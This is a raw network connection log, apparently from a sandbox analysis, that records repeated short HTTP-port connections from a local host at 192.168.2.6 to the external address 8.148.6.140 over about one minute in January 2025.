Jan 10, 2025 09:25:53.923063993 CET	50011	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:53.927803040 CET	80	50011	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:54.939260960 CET	80	50011	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:54.939343929 CET	80	50011	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:54.939445972 CET	50011	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:54.939446926 CET	50011	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:54.939555883 CET	50011	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:54.944524050 CET	80	50011	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:55.055161953 CET	50012	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:55.060081005 CET	80	50012	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:55.060234070 CET	50012	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:55.060357094 CET	50012	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:55.065149069 CET	80	50012	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:59.054325104 CET	50012	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:59.169287920 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:59.174364090 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:59.174479008 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:59.174638987 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:59.179419994 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.145867109 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.145940065 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.145961046 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.146022081 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.146054983 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.146245003 CET	50013	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.151032925 CET	80	50013	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.258383036 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.263279915 CET	80	50014	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:00.263350964 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.263515949 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:00.268316984 CET	80	50014	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:01.230549097 CET	80	50014	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:01.230654001 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.230680943 CET	80	50014	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:01.230770111 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.231236935 CET	50014	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.236025095 CET	80	50014	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:01.336622953 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.429048061 CET	80	50016	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:01.429155111 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.429548025 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:01.434360027 CET	80	50016	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:02.395895004 CET	80	50016	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:02.395987034 CET	80	50016	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:02.396032095 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.396073103 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.419466972 CET	50016	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.424411058 CET	80	50016	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:02.536065102 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.540910959 CET	80	50017	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:02.541012049 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.544296026 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:02.549105883 CET	80	50017	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:04.144680023 CET	80	50017	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:04.144728899 CET	80	50017	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:04.144751072 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.144777060 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.144901991 CET	50017	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.149610043 CET	80	50017	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:04.257961035 CET	50018	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.262945890 CET	80	50018	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:04.263091087 CET	50018	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.263178110 CET	50018	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:04.268057108 CET	80	50018	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:08.324578047 CET	50018	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:08.510780096 CET	50019	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:08.515815020 CET	80	50019	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:08.515917063 CET	50019	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:08.516064882 CET	50019	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:08.520910025 CET	80	50019	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:12.483911037 CET	80	50019	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:12.483927965 CET	80	50019	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:12.484111071 CET	50019	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:12.484288931 CET	50019	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:12.489027023 CET	80	50019	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:12.586726904 CET	50020	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:12.591837883 CET	80	50020	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:12.592005968 CET	50020	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:12.592144012 CET	50020	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:12.597019911 CET	80	50020	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:13.553263903 CET	80	50020	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:13.553280115 CET	80	50020	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:13.553374052 CET	50020	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:13.553550005 CET	50020	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:13.558728933 CET	80	50020	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:13.664518118 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:13.669464111 CET	80	50022	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:13.669574976 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:13.669687033 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:13.674851894 CET	80	50022	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:14.632354975 CET	80	50022	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:14.632369041 CET	80	50022	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:14.632415056 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.632436991 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.632548094 CET	50022	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.637298107 CET	80	50022	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:14.744685888 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.749839067 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:14.750015974 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.750066042 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:14.754842043 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.712852001 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.712863922 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.712934971 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.712939024 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.712975979 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.722497940 CET	50023	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.727328062 CET	80	50023	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.836091995 CET	50024	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.840897083 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:15.840996981 CET	50024	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.841090918 CET	50024	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:15.845882893 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.835022926 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.835037947 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.835045099 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.835134029 CET	50024	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:16.835557938 CET	50024	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:16.840361118 CET	80	50024	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.947524071 CET	50025	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:16.952724934 CET	80	50025	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:16.952841997 CET	50025	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:16.975497961 CET	50025	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:16.980402946 CET	80	50025	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:17.947873116 CET	80	50025	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:17.947891951 CET	80	50025	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:17.947968006 CET	50025	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:17.948108912 CET	50025	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:17.953362942 CET	80	50025	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:18.054968119 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:18.059933901 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:18.060020924 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:18.060146093 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:18.064996004 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.008219957 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.008289099 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.008323908 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.008436918 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.008436918 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.008625984 CET	50026	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.013546944 CET	80	50026	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.117366076 CET	50027	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.122629881 CET	80	50027	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:19.124802113 CET	50027	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.124938011 CET	50027	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:19.129900932 CET	80	50027	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:20.067663908 CET	80	50027	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:20.067689896 CET	80	50027	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:20.067948103 CET	50027	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:20.110785007 CET	50027	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:20.115776062 CET	80	50027	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:20.231334925 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:20.236210108 CET	80	50028	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:20.236289978 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:20.236419916 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:20.241245985 CET	80	50028	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:21.747904062 CET	80	50028	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:21.747980118 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.748054028 CET	80	50028	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:21.748146057 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.868688107 CET	50028	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.869049072 CET	50029	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.873605967 CET	80	50028	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:21.873910904 CET	80	50029	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:21.873980999 CET	50029	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.874087095 CET	50029	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:21.878880978 CET	80	50029	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:22.864389896 CET	80	50029	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:22.864434004 CET	80	50029	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:22.864510059 CET	50029	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:22.887018919 CET	50029	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:22.891829967 CET	80	50029	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:23.071881056 CET	50030	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:23.076858044 CET	80	50030	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:23.077271938 CET	50030	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:23.079349995 CET	50030	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:23.084202051 CET	80	50030	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:24.001163006 CET	80	50030	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:24.001249075 CET	50030	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:24.001437902 CET	50030	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:24.008352995 CET	80	50030	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:24.119894028 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:24.125047922 CET	80	50031	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:24.125127077 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:24.125369072 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:24.130162001 CET	80	50031	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:25.111063004 CET	80	50031	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:25.111202002 CET	80	50031	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:25.111213923 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.111325979 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.230324984 CET	50031	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.230849981 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.235209942 CET	80	50031	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:25.235737085 CET	80	50032	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:25.235817909 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.237972021 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:25.242763996 CET	80	50032	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:27.564515114 CET	80	50032	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:27.564663887 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.564673901 CET	80	50032	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:27.564723015 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.564949989 CET	50032	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.569664955 CET	80	50032	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:27.683604002 CET	50033	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.688416004 CET	80	50033	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:27.688498020 CET	50033	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.688795090 CET	50033	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:27.693561077 CET	80	50033	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:31.650252104 CET	80	50033	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:31.650276899 CET	80	50033	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:31.650330067 CET	50033	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:31.659009933 CET	50033	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:31.663733006 CET	80	50033	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:31.778351068 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:31.783360004 CET	80	50035	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:31.784796953 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:31.788022995 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:31.792829990 CET	80	50035	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:33.370791912 CET	80	50035	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:33.370851040 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.370912075 CET	80	50035	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:33.371078968 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.372934103 CET	50035	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.377780914 CET	80	50035	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:33.517013073 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.521897078 CET	80	50036	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:33.521969080 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.522105932 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:33.526895046 CET	80	50036	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:34.485897064 CET	80	50036	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:34.485986948 CET	80	50036	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:34.486022949 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.491816998 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.603147984 CET	50036	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.603661060 CET	50037	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.608058929 CET	80	50036	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:34.608462095 CET	80	50037	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:34.609361887 CET	50037	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.609361887 CET	50037	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:34.614222050 CET	80	50037	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:38.553550959 CET	80	50037	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:38.553575993 CET	80	50037	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:38.553683043 CET	50037	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:38.553767920 CET	50037	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:38.558522940 CET	80	50037	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:38.683163881 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:38.688488007 CET	80	50038	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:38.691297054 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:38.691401005 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:38.696599960 CET	80	50038	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:39.643378973 CET	80	50038	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:39.643477917 CET	80	50038	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:39.643486023 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.643529892 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.643606901 CET	50038	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.648366928 CET	80	50038	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:39.760520935 CET	50039	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.765386105 CET	80	50039	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:39.765455008 CET	50039	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.765594959 CET	50039	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:39.770365953 CET	80	50039	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:40.722172022 CET	80	50039	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:40.722203016 CET	80	50039	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:40.722826004 CET	50039	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:40.723155975 CET	50039	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:40.729857922 CET	80	50039	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:40.851182938 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:40.856065989 CET	80	50040	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:40.859349966 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:40.863178968 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:40.867939949 CET	80	50040	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:41.842161894 CET	80	50040	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:41.842221022 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.842313051 CET	80	50040	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:41.842359066 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.947555065 CET	50040	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.948003054 CET	50041	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.952337980 CET	80	50040	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:41.952815056 CET	80	50041	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:41.952990055 CET	50041	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.953031063 CET	50041	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:41.957741022 CET	80	50041	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:42.940922976 CET	80	50041	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:42.940999031 CET	80	50041	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:42.941097975 CET	50041	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:42.941313028 CET	50041	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:42.946038961 CET	80	50041	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:43.063050985 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:43.067805052 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:43.068063974 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:43.068310976 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:43.073060036 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.037074089 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.037122965 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.037169933 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.037213087 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.037271976 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.037311077 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.037374973 CET	50042	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.042093992 CET	80	50042	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.151787996 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.157315969 CET	80	50043	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:44.157485962 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.157594919 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:44.163160086 CET	80	50043	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:45.114870071 CET	80	50043	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:45.114898920 CET	80	50043	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:45.115075111 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.115184069 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.115813971 CET	50043	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.120546103 CET	80	50043	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:45.230488062 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.235420942 CET	80	50044	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:45.239339113 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.239943027 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:45.244690895 CET	80	50044	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:46.176141977 CET	80	50044	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:46.176219940 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.176253080 CET	80	50044	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:46.176299095 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.176426888 CET	50044	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.181204081 CET	80	50044	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:46.309298038 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.314295053 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:46.318027020 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.318027020 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:46.322813034 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.297995090 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.298146009 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.298156977 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.298160076 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.298252106 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.298252106 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.298403978 CET	50045	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.303145885 CET	80	50045	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.416507006 CET	50046	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.421351910 CET	80	50046	8.148.6.140	192.168.2.6
Jan 10, 2025 09:26:47.421423912 CET	50046	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.421591043 CET	50046	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:26:47.426361084 CET	80	50046	8.148.6.140	192.168.2.6
